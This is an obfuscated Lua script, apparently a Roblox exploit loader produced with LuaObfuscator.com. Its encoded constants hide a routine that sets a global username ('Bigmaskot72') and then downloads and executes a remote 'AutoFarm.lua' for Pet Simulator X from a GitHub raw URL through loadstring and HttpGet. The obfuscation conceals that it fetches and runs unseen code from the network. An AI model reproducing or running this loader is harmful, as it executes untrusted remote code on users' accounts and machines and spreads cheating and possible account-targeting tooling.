--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v80=0;while true do if (v80==0) then v19=v0(v3(v30,1,1));return "";end end else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v102=v5(v82,v19);v19=nil;return v102;else return v82;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-((1639 -(1523 + 114)) -1)) -(v32-((558 + 62) -(555 + 64)))) + 1)) ;return v83-(v83%((1328 -396) -(857 + 74))) ;else local v84=(1633 -(68 + 997)) -(367 + 201) ;local v85;while true do if (v84==(927 -(214 + 713))) then v85=2^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (877 -(282 + 595)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;return (v36 * (373 -(32 + 85))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 1 + 3 ;return (v40 * (16778173 -(892 + 65))) + (v39 * (156337 -(166694 -75893))) + (v38 * (472 -216)) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1;local v44=(v20(v42,351 -(87 + 0 + 263) ,200 -(67 + 113) ) * ((2 + 0)^(78 -46))) + v41 ;local v45=v20(v42,16 + 5 ,(914 -(368 + 423)) -92 );local v46=((v20(v42,984 -(802 + 150) )==(2 -(3 -2))) and  -(1 -(18 -(10 + 8)))) or 1 ;if (v45==(0 -0)) then if (v44==0) then return v46 * (0 + (442 -(416 + 26))) ;else local v91=0;while true do if ((997 -(915 + 82))==v91) then v45=2 -1 ;v43=0 + 0 ;break;end end end elseif (v45==(2691 -644)) then return ((v44==0) and (v46 * ((1188 -((3412 -2343) + 118))/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(2237 -1214) ) * (v43 + (v44/((1 + 1)^(92 -40)))) ;end local function v25(v47)local v48=0 + 0 ;local v49;local v50;while true do if (v48==(0 -0)) then v49=nil;if  not v47 then v47=v23();if (v47==(438 -(145 + 293))) then return "";end end v48=431 -(44 + 386) ;end if (v48==(1489 -(998 + 488))) then return v6(v50);end if (v48==1) then v49=v3(v16,v18,(v18 + v47) -(1 + 0) );v18=v18 + v47 ;v48=2 + 0 ;end if (v48==(774 -((836 -635) + 571))) then v50={};for v92=1, #v49 do v50[v92]=v2(v1(v3(v49,v92,v92)));end v48=1141 -(116 + 1022) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 -0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51~=(1131 -(369 + 761))) then else v54=nil;v55=nil;v51=4 -2 ;end if (v51~=3) then else local v89=603 -(268 + 335) ;while true do if ((290 -(60 + 230))~=v89) then else v58=nil;v59=nil;v89=573 -(426 + 146) ;end if (v89==1) then v51=1 + 3 ;break;end end end if (v51==(1460 -(282 + 1174))) then while true do if (v52==(1 -0)) then local v98=0;while true do if (v98~=(811 -(569 + 242))) then else v55=nil;v56=nil;v98=2 -1 ;end if (v98==(1 + 0)) then v52=2;break;end end end if (v52~=(1026 -(706 + 318))) then else local v99=0 -0 ;local v100;while true do if ((336 -(144 + 192))~=v99) then else v100=216 -(42 + 174) ;while true do if (v100==0) then local v148=1251 -(721 + 530) ;while true do if (v148~=(1 + 0)) then else v100=1272 -(945 + 326) ;break;end if (v148==(0 + 0)) then v57=nil;v58=nil;v148=1 + 0 ;end end end if (v100~=(2 -1)) then else v52=3 + 0 ;break;end end break;end end end if (v52==(700 -(271 + 429))) then local v101=0 + 0 ;while true do if ((0 + 0)==v101) then v53=0;v54=nil;v101=1501 -(1408 + 92) ;end if (v101==(1087 -(461 + 625))) then v52=1;break;end end end if (v52~=(1291 -(993 + 295))) then else v59=nil;while true do local v103=0;local v104;while true do if ((1975 -(1913 + 62))==v103) then v104=0;while true do if (v104~=(0 + 0)) then else local v150=0 -0 ;while true do if (v150==(1 + 0)) then v104=1172 -(418 + 753) ;break;end if (v150==(0 -0)) then if (v53~=(1 + 1)) then else local v158=0;local v159;local v160;while true do if (0==v158) then v159=1661 -(1477 + 184) ;v160=nil;v158=1 -0 ;end if (v158~=(1 + 0)) then else while true do if ((0 + 0)==v159) then v160=0 + 0 ;while true do if ((857 -(564 + 292))==v160) then for v168=530 -(406 + 123) ,v23() do local v169=0;local v170;local v171;local v172;while true do if (1==v169) then v172=nil;while true do if (v170==(1 -0)) then while true do if (v171==(1769 -(1749 + 20))) then v172=v21();if (v20(v172,305 -(244 + 60) ,1 + 0 )==(476 -(41 + 435))) then local v184=0 + 0 ;local v185;local v186;local v187;local v188;local v189;while true do if (v184~=(1324 -(1249 + 73))) then else v189=nil;while true do if (v185==(1 + 0)) then local v190=0 + 0 ;while true do if (v190==1) then v185=1147 -(466 + 679) ;break;end if (v190==0) then v188=nil;v189=nil;v190=2 -1 ;end end end if (v185==(5 -3)) then while true do if (v186==3) then if (v20(v188,1616 -(1565 + 48) ,1903 -(106 + 1794) )==(1 + 0)) then v189[4]=v59[v189[2 + 2 ]];end v54[v168]=v189;break;end if (v186==(267 -(176 + 91))) then local v195=0 -0 ;local v196;while true do if (v195~=(0 -0)) then else v196=1092 -(975 + 117) ;while true do if (v196~=0) then else v187=v20(v172,2,7 -4 );v188=v20(v172,118 -(4 + 110) ,590 -(57 + 527) );v196=1428 -(41 + 1386) ;end if (v196~=(104 -(17 + 86))) then else v186=1 + 0 ;break;end end break;end end end if (v186~=1) then else local v197=0 -0 ;while true do if (v197==(0 -0)) then v189={v22(),v22(),nil,nil};if (v187==(0 -0)) then local v201=0;local v202;while true do if ((0 -0)==v201) then v202=1018 -(697 + 321) ;while true do if (v202==(0 + 0)) then v189[3]=v22();v189[4]=v22();break;end end break;end end elseif (v187==(1 -0)) then v189[6 -3 ]=v23();elseif (v187==(1 + 1)) then v189[5 -2 ]=v23() -(2^(3 + 13)) ;elseif (v187~=(5 -2)) then else local v211=1227 -(322 + 905) ;local v212;local v213;while true do if (v211==(611 -(602 + 9))) then local v214=0;while true do if (v214==(1190 -(449 + 740))) then v211=873 -(826 + 46) ;break;end if (v214==(947 -(245 + 702))) then v212=65 -(30 + 35) ;v213=nil;v214=1 + 0 ;end end end if (v211~=1) then else while true do if (v212~=(1257 -(1043 + 214))) then else v213=0 -0 ;while true do if (v213~=(1212 -(323 + 889))) then else v189[3]=v23() -((5 -3)^16) ;v189[1902 -(260 + 1638) ]=v22();break;end end break;end end break;end end end v197=441 -(382 + 58) ;end if (1==v197) then v186=582 -(361 + 219) ;break;end end end if (v186~=(2 + 0)) then else local v198=0 -0 ;while true do if (v198~=(0 -0)) then else if (v20(v188,1206 -(902 + 303) ,321 -(53 + 267) )~=1) then else v189[3 -1 ]=v59[v189[4 -2 ]];end if (v20(v188,1 + 1 ,2)==(1 + 0)) then v189[217 -(22 + 192) ]=v59[v189[3]];end v198=1;end if ((414 -(15 + 398))==v198) then v186=3;break;end end end end break;end if ((982 -(18 + 964))==v185) then local v191=0 -0 ;while true do if (v191==0) then v186=0 + 0 ;v187=nil;v191=1 + 0 ;end if (v191==(1 -0)) then v185=851 -(20 + 830) ;break;end end end end break;end if (v184~=(0 + 0)) then else v185=126 -(116 + 10) ;v186=nil;v184=1 + 0 ;end if (1~=v184) then else v187=nil;v188=nil;v184=6 -4 ;end end end break;end end break;end if (v170==(0 -0)) then local v179=0 -0 ;while true do if (v179==(738 -(542 + 196))) then v171=0;v172=nil;v179=1 -0 ;end if (v179~=(237 -(141 + 95))) then else v170=1 + 0 ;break;end end end end break;end if (v169==0) then v170=0 + 0 ;v171=nil;v169=2 -1 ;end end end v53=6 -3 ;break;end if (v160~=(0 + 0)) then else local v167=0 -0 ;while true do if (v167==(1 + 0)) then v160=2 -1 ;break;end if ((0 + 0)==v167) then for v174=2 -1 ,v58 do local v175=1551 -(1126 + 425) ;local v176;local v177;local v178;while true do if (v175==0) then v176=0;v177=nil;v175=406 -(118 + 287) ;end if (v175==1) then v178=nil;while true do if (v176==(3 -2)) then if (v177==1) then v178=v21()~=(0 + 0) ;elseif (v177==(1123 -(118 + 1003))) then v178=v24();elseif (v177==(8 -5)) then v178=v25();end v59[v174]=v178;break;end if (v176==(377 -(142 + 235))) then local v181=0 -0 ;local v182;local v183;while true do if (v181==1) then while true do if (v182==(0 -0)) then v183=765 -(574 + 191) ;while true do if ((0 + 0)==v183) then local v192=0;local v193;while true do if (v192~=(977 -(553 + 424))) then else v193=0 -0 ;while true do if (v193==(0 + 0)) then v177=v21();v178=nil;v193=1 + 0 ;end if (v193~=(850 -(254 + 595))) then else v183=1;break;end end break;end end end if (1~=v183) then else v176=127 -(55 + 71) ;break;end end break;end end break;end if (0==v181) then v182=0;v183=nil;v181=1;end end end end break;end end end v57[3 + 0 ]=v21();v167=1791 -(573 + 1217) ;end end end end break;end end break;end end end if (v53==(2 -1)) then local v161=0 + 0 ;local v162;while true do if ((0 + 0)==v161) then v162=0;while true do if (1==v162) then v59={};v53=1 + 1 ;break;end if (v162==(0 + 0)) then v57={v54,v55,nil,v56};v58=v23();v162=1;end end break;end end end v150=1;end end end if (v104==(2 -1)) then if (v53~=(7 -4)) then else local v153=0 + 0 ;local v154;while true do if (v153==(0 -0)) then v154=806 -(118 + 688) ;while true do if (v154~=0) then else local v163=0 -0 ;while true do if (v163==(48 -(25 + 23))) then for v165=1 + 0 ,v23() do v55[v165-1 ]=v28();end return v57;end end end end break;end end end if (v53==(0 -0)) then local v155=753 -(239 + 514) ;local v156;local v157;while true do if (v155==(1887 -(927 + 959))) then while true do if (v156==0) then v157=0;while true do if (v157~=(3 -2)) then else v56={};v53=1;break;end if (v157~=(0 + 0)) then else local v164=0 -0 ;while true do if (v164==(1330 -(797 + 532))) then v157=1 + 0 ;break;end if (v164==(0 + 0)) then v54={};v55={};v164=286 -(175 + 110) ;end end end end break;end end break;end if (v155~=0) then else v156=0 -0 ;v157=nil;v155=4 -3 ;end end end break;end end break;end end end break;end end break;end if (v51==2) then local v90=0 -0 ;while true do if (v90~=(1203 -(373 + 829))) then else v51=3;break;end if (v90~=0) then else v56=nil;v57=nil;v90=1;end end end if ((0 -0)~=v51) then else v52=731 -(476 + 255) ;v53=nil;v51=1062 -(810 + 251) ;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v86=0,v74 do if (v86>=v68) then v72[v86-v68 ]=v73[v86 + 1 ];else v76[v86]=v73[v86 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do v78=v66[v70];v79=v78[1];if (v79<=5) then if (v79<=2) then if (v79<=0) then for v107=v78[2],v78[3] do v76[v107]=nil;end elseif (v79>1) then local v109=0;local v110;while true do if (v109==0) then v110=v78[2];v76[v110]=v76[v110](v13(v76,v110 + 1 ,v71));break;end end elseif (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79<=3) then v70=v78[3];elseif (v79>4) then local v111;local v112,v113;local v114;local v115;v76[v78[2]][v78[3]]=v78[4];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v62[v78[3]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v62[v78[3]];v70=v70 + 1 ;v78=v66[v70];v115=v78[2];v114=v76[v78[3]];v76[v115 + 1 ]=v114;v76[v115]=v114[v78[4]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3]~=0 ;v70=v70 + 1 ;v78=v66[v70];v115=v78[2];v112,v113=v69(v76[v115](v13(v76,v115 + 1 ,v78[3])));v71=(v113 + v115) -1 ;v111=0;for v142=v115,v71 do v111=v111 + 1 ;v76[v142]=v112[v111];end v70=v70 + 1 ;v78=v66[v70];v115=v78[2];v76[v115]=v76[v115](v13(v76,v115 + 1 ,v71));v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]();v70=v70 + 1 ;v78=v66[v70];v70=v78[3];else local v127=v78[2];local v128=v76[v78[3]];v76[v127 + 1 ]=v128;v76[v127]=v128[v78[4]];end elseif (v79<=8) then if (v79<=6) then v76[v78[2]]=v78[3]~=0 ;elseif (v79==7) then v76[v78[2]][v78[3]]=v78[4];else local v134=v78[2];local v135,v136=v69(v76[v134](v13(v76,v134 + 1 ,v78[3])));v71=(v136 + v134) -1 ;local v137=0;for v145=v134,v71 do v137=v137 + 1 ;v76[v145]=v135[v137];end end elseif (v79<=10) then if (v79==9) then v76[v78[2]]();else v76[v78[2]]=v62[v78[3]];end elseif (v79>11) then v76[v78[2]]=v78[3];else do return;end end v70=v70 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!083O00028O0003023O005F4703083O00557365724E616D65030B3O004269676D61736B6F743732030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F7258536372697074732F6D61696E2F4175746F4661726D2E6C756100163O00120C3O00016O000100013O0026013O0002000100010004033O0002000100120C000100013O00260100010005000100010004033O0005000100120A000200023O00300500020003000400122O000200053O00122O000300063O00202O00030003000700122O000500086O000600016O000300066O00023O00024O00020001000100044O001500010004033O000500010004033O001500010004033O000200012O000B3O00017O00",v9(),...);
